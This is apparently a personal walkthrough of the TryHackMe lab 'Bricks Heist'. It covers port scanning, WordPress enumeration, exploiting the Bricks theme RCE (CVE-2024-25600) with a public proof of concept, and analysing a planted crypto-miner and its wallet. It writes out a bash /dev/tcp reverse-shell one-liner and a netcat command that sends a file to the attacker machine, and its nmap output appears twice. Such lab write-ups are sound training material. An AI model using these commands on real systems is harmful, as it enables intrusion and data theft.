TryHack3M: Bricks Heist

2ea5dc646449d5713b63aab241ead431.png

Target IP: 10.10.111.103
Challenge Description:
fa779db3f9f56ccf33d5a223d3691166.png


Reconnaissance

0f69c05d442672d83649ff929e2daf58.png
The challenge mentions to insert the hostname inside my /etc/hosts file. Then I inserted the hostname bricks.thm inside my /etc/hosts file as shown above. Time to begin with the reconnaissance now.

0e1809f0fa4a3b308016d7bde0935c64.png
Performing a port scan using the command sudo nmap -sS bricks.thm -p- returns the result shown above. By the looks of it, there are four TCP ports open on the target machine. They are SSH, HTTP, HTTPS, and MySQL applications. Time to perform a further reconnaissance to identify these ports.

┌──(kali㉿kali)-[~/Desktop/Lab-Resource/Completed/TryHack3M:BricksHeist]
└─$ sudo nmap -sV -A bricks.thm -p 22,80,443,3306
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-24 20:27 UTC
Nmap scan report for bricks.thm (10.10.111.103)
Host is up (0.023s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 8e:e4:a7:c3:91:b7:7e:dc:c4:ae:7e:3e:e6:3c:f2:57 (RSA)
|   256 79:ea:dd:5e:06:c7:19:58:ab:eb:49:b9:d9:e7:01:e1 (ECDSA)
|_  256 00:37:32:64:04:b4:80:40:db:8c:62:ad:1f:49:f0:82 (ED25519)
80/tcp   open  http     WebSockify Python/3.8.10
|_http-title: Error response
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 405 Method Not Allowed
|     Server: WebSockify Python/3.8.10
|     Date: Wed, 24 Apr 2024 20:27:37 GMT
|     Connection: close
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 472
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 405</p>
|     <p>Message: Method Not Allowed.</p>
|     <p>Error code explanation: 405 - Specified method is invalid for this resource.</p>
|     </body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 501 Unsupported method ('OPTIONS')
|     Server: WebSockify Python/3.8.10
|     Date: Wed, 24 Apr 2024 20:27:37 GMT
|     Connection: close
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 500
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 501</p>
|     <p>Message: Unsupported method ('OPTIONS').</p>
|     <p>Error code explanation: HTTPStatus.NOT_IMPLEMENTED - Server does not support this operation.</p>
|     </body>
|_    </html>
|_http-server-header: WebSockify Python/3.8.10
443/tcp  open  ssl/http Apache httpd
| tls-alpn: 
|   h2
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache
|_http-generator: WordPress 6.5
|_http-title: Brick by Brick
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=US
| Not valid before: 2024-04-02T11:59:14
|_Not valid after:  2025-04-02T11:59:14
3306/tcp open  mysql    MySQL (unauthorized)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.94%I=7%D=4/24%Time=66296B35%P=x86_64-pc-linux-gnu%r(GetR
SF:equest,291,"HTTP/1\.1\x20405\x20Method\x20Not\x20Allowed\r\nServer:\x20
SF:WebSockify\x20Python/3\.8\.10\r\nDate:\x20Wed,\x2024\x20Apr\x202024\x20
SF:20:27:37\x20GMT\r\nConnection:\x20close\r\nContent-Type:\x20text/html;c
SF:harset=utf-8\r\nContent-Length:\x20472\r\n\r\n<!DOCTYPE\x20HTML\x20PUBL
SF:IC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x20\x20\x2
SF:0\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-equiv=\"Cont
SF:ent-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x20\x20\x20\x2
SF:0\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\x20</head>\
SF:n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>Error\x20r
SF:esponse</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code:\x20405<
SF:/p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Method\x20Not\x20Al
SF:lowed\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code\x20explan
SF:ation:\x20405\x20-\x20Specified\x20method\x20is\x20invalid\x20for\x20th
SF:is\x20resource\.</p>\n\x20\x20\x20\x20</body>\n</html>\n")%r(HTTPOption
SF:s,2B9,"HTTP/1\.1\x20501\x20Unsupported\x20method\x20\('OPTIONS'\)\r\nSe
SF:rver:\x20WebSockify\x20Python/3\.8\.10\r\nDate:\x20Wed,\x2024\x20Apr\x2
SF:02024\x2020:27:37\x20GMT\r\nConnection:\x20close\r\nContent-Type:\x20te
SF:xt/html;charset=utf-8\r\nContent-Length:\x20500\r\n\r\n<!DOCTYPE\x20HTM
SF:L\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x
SF:20\x20\x20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x
SF:20\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-equ
SF:iv=\"Content-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x20\x
SF:20\x20\x20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\x2
SF:0</head>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>E
SF:rror\x20response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code
SF::\x20501</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Unsupporte
SF:d\x20method\x20\('OPTIONS'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>
SF:Error\x20code\x20explanation:\x20HTTPStatus\.NOT_IMPLEMENTED\x20-\x20Se
SF:rver\x20does\x20not\x20support\x20this\x20operation\.</p>\n\x20\x20\x20
SF:\x20</body>\n</html>\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.2 - 4.9 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
1   23.15 ms 10.14.0.1
2   23.62 ms bricks.thm (10.10.111.103)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.61 seconds
┌──(kali㉿kali)-[~/Desktop/Lab-Resource/Completed/TryHack3M:BricksHeist]
└─$ sudo nmap -sV -A bricks.thm -p 22,80,443,3306
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-24 20:27 UTC
Nmap scan report for bricks.thm (10.10.111.103)
Host is up (0.023s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 8e:e4:a7:c3:91:b7:7e:dc:c4:ae:7e:3e:e6:3c:f2:57 (RSA)
|   256 79:ea:dd:5e:06:c7:19:58:ab:eb:49:b9:d9:e7:01:e1 (ECDSA)
|_  256 00:37:32:64:04:b4:80:40:db:8c:62:ad:1f:49:f0:82 (ED25519)
80/tcp   open  http     WebSockify Python/3.8.10
|_http-title: Error response
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 405 Method Not Allowed
|     Server: WebSockify Python/3.8.10
|     Date: Wed, 24 Apr 2024 20:27:37 GMT
|     Connection: close
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 472
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 405</p>
|     <p>Message: Method Not Allowed.</p>
|     <p>Error code explanation: 405 - Specified method is invalid for this resource.</p>
|     </body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 501 Unsupported method ('OPTIONS')
|     Server: WebSockify Python/3.8.10
|     Date: Wed, 24 Apr 2024 20:27:37 GMT
|     Connection: close
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 500
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 501</p>
|     <p>Message: Unsupported method ('OPTIONS').</p>
|     <p>Error code explanation: HTTPStatus.NOT_IMPLEMENTED - Server does not support this operation.</p>
|     </body>
|_    </html>
|_http-server-header: WebSockify Python/3.8.10
443/tcp  open  ssl/http Apache httpd
| tls-alpn: 
|   h2
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache
|_http-generator: WordPress 6.5
|_http-title: Brick by Brick
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=US
| Not valid before: 2024-04-02T11:59:14
|_Not valid after:  2025-04-02T11:59:14
3306/tcp open  mysql    MySQL (unauthorized)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.94%I=7%D=4/24%Time=66296B35%P=x86_64-pc-linux-gnu%r(GetR
SF:equest,291,"HTTP/1\.1\x20405\x20Method\x20Not\x20Allowed\r\nServer:\x20
SF:WebSockify\x20Python/3\.8\.10\r\nDate:\x20Wed,\x2024\x20Apr\x202024\x20
SF:20:27:37\x20GMT\r\nConnection:\x20close\r\nContent-Type:\x20text/html;c
SF:harset=utf-8\r\nContent-Length:\x20472\r\n\r\n<!DOCTYPE\x20HTML\x20PUBL
SF:IC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x20\x20\x2
SF:0\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-equiv=\"Cont
SF:ent-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x20\x20\x20\x2
SF:0\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\x20</head>\
SF:n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>Error\x20r
SF:esponse</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code:\x20405<
SF:/p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Method\x20Not\x20Al
SF:lowed\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code\x20explan
SF:ation:\x20405\x20-\x20Specified\x20method\x20is\x20invalid\x20for\x20th
SF:is\x20resource\.</p>\n\x20\x20\x20\x20</body>\n</html>\n")%r(HTTPOption
SF:s,2B9,"HTTP/1\.1\x20501\x20Unsupported\x20method\x20\('OPTIONS'\)\r\nSe
SF:rver:\x20WebSockify\x20Python/3\.8\.10\r\nDate:\x20Wed,\x2024\x20Apr\x2
SF:02024\x2020:27:37\x20GMT\r\nConnection:\x20close\r\nContent-Type:\x20te
SF:xt/html;charset=utf-8\r\nContent-Length:\x20500\r\n\r\n<!DOCTYPE\x20HTM
SF:L\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x
SF:20\x20\x20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x
SF:20\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-equ
SF:iv=\"Content-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x20\x
SF:20\x20\x20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\x2
SF:0</head>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>E
SF:rror\x20response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code
SF::\x20501</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Unsupporte
SF:d\x20method\x20\('OPTIONS'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>
SF:Error\x20code\x20explanation:\x20HTTPStatus\.NOT_IMPLEMENTED\x20-\x20Se
SF:rver\x20does\x20not\x20support\x20this\x20operation\.</p>\n\x20\x20\x20
SF:\x20</body>\n</html>\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.2 - 4.9 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
1   23.15 ms 10.14.0.1
2   23.62 ms bricks.thm (10.10.111.103)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.61 seconds

I ran the command sudo nmap -sV -A bricks.thm -p 22,80,443,3306 to identify more information about the four TCP ports and obtained the result shown above. The web applications on port 80 and 443 sounds the most interesting to me, and I will likely begin my enumeration here. The scanned result of the web application at port 443 shows a disallowed entry of /wp-admin. This sounds interesting. On the other side, the MySQL application does not allow me connect.


Enumeration

Port 443: HTTPs

32690513bfa92a5086bd673b1cf6321c.png
Browsing to https://bricks.thm returned me the webpage shown above. Reading through the source-code of this webpage contains the web application version and other useful information.

2381675f56f5c7ffe92870d96ecfaf45.png
Running Wapplyzer on the webpage returns the useful information shown above. The target machine is running Wordpress 6.5 by the looks of it. I can attack this web application further using the tool wpscan. Before doing this, I wish to enumerate further.

f28918e9911ad149e9f0634b90fdffc6.png
Previously, I discovered the /wp-admin disallowed entry. Visiting this page shows the webpage above. I tried to use the default credentials admin:password, but I had no luck. Time to scan for hidden directories. Since the web application is served on port 443, I can use the -k flag to disable tls checks using gobuster. I ran the command wpscan --url https://bricks.thm:443/ --enumerate u --disable-tls-checks against the target machine and identified a Wordpress user called administrator. This is another attack vector that I can use to bruteforce the password of this user. Time to identfify the plugins now.

2fe1ded13211a7273868307b491b77c3.png
Running the command wpscan --url https://bricks.thm/ --enumerate ap --plugins-detection aggressive --disable-tls-checks returned the interesting information to me, as shown above. The web application is using the theme Bricks and its version is 1.9.5.

e8c8bc46d964e8fbaa491bb2f74db7e6.png
And bingo! Doing a Google search for Bricks 1.9.5 exploit lead me to the interesting webpage shown above. It seems like the theme is vulnerable to RCE. The CVE identifier for this vulnerability is CVE-2024-25600. Time to test it.


Exploitation

a81a467dccdb79949578c28af8d6c0bd.png
I found the PoC exploit shown above at this Github repository. I downloaded the exploit on my machine by following the Installation process shown in the image above. Then I created a file with the name targets. This file contains the entry https://bricks.thm.

878dbc61a5964e354308d494fdfcdcf9.png
Then running the exploit against the target machine by using the command python exploit.py -l targets shows the web application is vulnerable! Bingo!! Time to run the interactive mode to perform RCE.

2903eed95303740f519346a7388db118.png
And voila! I managed to obtain a shell via the exploit. I ran the command python exploit.py -u https://bricks.thm to achieve a shell. I managed to successfully run the commands whoami, id, and ifconfig as shown above via the exploit using RCE. Time to obtain a reverse shell connection now.

630d12c8c875d7ea7a546073821f65f7.png
On my machine, I started a listener on port 8443 as shown on the bottom terminal on the picture above. Then on the exploit shell session, I ran the command bash -c "/bin/bash -i >& /dev/tcp/10.14.55.153/8443 0>&1". This executed successfully and I obtained a reverse shell connection with the session as apache, as shown above. Now I have a foothold on the target machine :)


Flags

ebcf309d9a0043009b1b3007a62f841d.png
The first flag is shown above after compromising the web server.

6d35a28b6148513455d269972696a76d.png
I ran the command systemctl and found an interesting process with the name TRYHACK3M, as shown above. I can use the status command to find more information about this process.

cc36d16451a57c859bb174e3af52f5f4.png
I ran the command systemctl status ubuntu.service and obtained more information, as shown above. The main process is nm-inet-dialog, as shown above.

dd39f535f66ca477f2768d8d04943821.png
The malicious binary location is shown above. To find this, I ran the command find / -name "nm-inet-dialog" 2>/dev/null. The location of this binary is at /usr/lib/NetworkManager/.

0b2dc72083c630177c3eab06feb81fdb.png
I transferred the malicious binary to my machine using netcat. On the target machine, I ran the command nc -w 3 10.14.55.153 1234 < nm-inet-dialog. Then on my attack machine, I executed the command nc -l -p 1234 > nm-inet-dialog. I successfully transferred this binary to my machine, as shown above. I ran strings on it, but I did not find anything useful.

8aee3d643f20131796e5bd327e61c43b.png
I uploaded this binary to VirusTotal and obtained the result shown above. This binary is malicious.

5bd424825be00926e2a49de50d6b4995.png
Viewing the Opened Files sections shows it opened the file inet.conf, as shown above. This is unusual.

6a318dc7c84a1f4b744aa5954200d0f1.png
On the target machine, I executed the command /usr/lib/NetworkManager/inet.conf and obtained the result shown above. The long string with the label ID 5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b616c70555a7a566b52335276546b686b65575248647a525a57466f77546b64334d6b347a526d685a6255313459316873636b35366247315a4d304531595564476130355864486c6157454a3557544a564e453959556e4a685246497a5932355363303948526a4a6b52464a7a546d706b65466c525054303d seems interesting to me. Maybe it is some sort of identifier of the attacker?

1f5ebbf3181f8155c3fb885b08d74f74.png
Using Cyberchef, I managed to decode the string and obtain the result shown above. This is the wallet address, bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa, of the miner instance. Only the half part of the string is the flag.

a8371866ea4507cceed2c01e31be7627.png
And bingo! I found the wallet using Blockchain, as shown above. There are multiple transaction from and to this wallet address. One of them being the address bc1q5jqgm7nvrhaw2rh2vk0dk8e4gg5g373g0vz07r. I did a Google search for this wallet address and found an article stating it is used by the threat actor group Lockbit.